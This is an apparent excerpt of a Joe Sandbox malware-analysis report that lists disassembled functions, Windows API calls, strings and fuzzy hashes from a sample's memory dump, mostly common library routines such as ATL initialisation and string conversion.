                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 624084870-1403004172
                                                              • Opcode ID: eff37998f0b7417e51da8629ac81db230a733642a3fc101e5ee70f88635537da
                                                              • Instruction ID: 5597f9bbaa8612b82dc8f1e7fa3ff22e216d6815ac61d778f671848d9f5abc10
                                                              • Opcode Fuzzy Hash: eff37998f0b7417e51da8629ac81db230a733642a3fc101e5ee70f88635537da
                                                              • Instruction Fuzzy Hash: 9CF0F475A44619AACB24E7A49C52FFF7B78AF00710F040A15B822A72C7DF609D0C9264
                                                              Function 00C710D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C6FAE2: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C71102,?,?,?,00C5100A), ref: 00C6FAE7
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00C5100A), ref: 00C71106
                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C5100A), ref: 00C71115
                                                              Strings
                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C71110
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                              • API String ID: 55579361-631824599
                                                              • Opcode ID: 90b4e80c1b93a6660592089e29094b968d8d3bc495edb318d0aaf0ce6cde13c6
                                                              • Instruction ID: 5e1c0db87386b5bc06c522c1d4d6cc0d7a01fa4421f5d433e297fec70c1f6ece
                                                              • Opcode Fuzzy Hash: 90b4e80c1b93a6660592089e29094b968d8d3bc495edb318d0aaf0ce6cde13c6
                                                              • Instruction Fuzzy Hash: D5E092B06003408BD770DF28E84435ABBF4AF04700F54CD6CED8ACA292E7B4D884DBA1
                                                              Function 00CE2C81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CE2C8B
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CE2C9E
                                                                • Part of subcall function 00CBF1A7: Sleep.KERNEL32 ref: 00CBF21F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: f4495e004a11020d10e21caab99d772b566d2c7eca8a3711012da2e59039d96f
                                                              • Instruction ID: 6af8b187f77b19e0e43ea71560cb300aa1aa2e1c7dd7cabcaae0747bb66f7f1f
                                                              • Opcode Fuzzy Hash: f4495e004a11020d10e21caab99d772b566d2c7eca8a3711012da2e59039d96f
                                                              • Instruction Fuzzy Hash: 71D0123A3C9390BBF668B770EC4FFDE6A54AB50B10F100C15774AAE1D0C9E06841C664
                                                              Function 00CE2CB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CE2CCB
                                                              • PostMessageW.USER32(00000000), ref: 00CE2CD2
                                                                • Part of subcall function 00CBF1A7: Sleep.KERNEL32 ref: 00CBF21F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: 3f18a3be55fc57304e0b3c57061117a9e19ec580f44c6320198219bb1bb76351
                                                              • Instruction ID: 9c42b03f529faf375ea7bcd1d15001aacbcb90803baf154ddf8679e18e35d8a6
                                                              • Opcode Fuzzy Hash: 3f18a3be55fc57304e0b3c57061117a9e19ec580f44c6320198219bb1bb76351
                                                              • Instruction Fuzzy Hash: EED012363C53907FF668B770EC4FFCE6A54AB54B10F500C157746AE1D0C9E06841C668
                                                              Function 00C8C19D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C8C233
                                                              • GetLastError.KERNEL32 ref: 00C8C241
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C8C29C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                              • String ID:
                                                              • API String ID: 1717984340-0
                                                              • Opcode ID: b71f4a7a3283075c7864527de69d67fd00094e01781f01a2d23bd228f84498ee
                                                              • Instruction ID: 7c79dc1556af896bdb1abee8e3d42f31adc56c298d87d9856de7ce93ac8e23a9
                                                              • Opcode Fuzzy Hash: b71f4a7a3283075c7864527de69d67fd00094e01781f01a2d23bd228f84498ee
                                                              • Instruction Fuzzy Hash: 3341B731600256EFCB21AFE5C8C4BAE7BA5EF45324F158169F869AB1E1DB308E01D774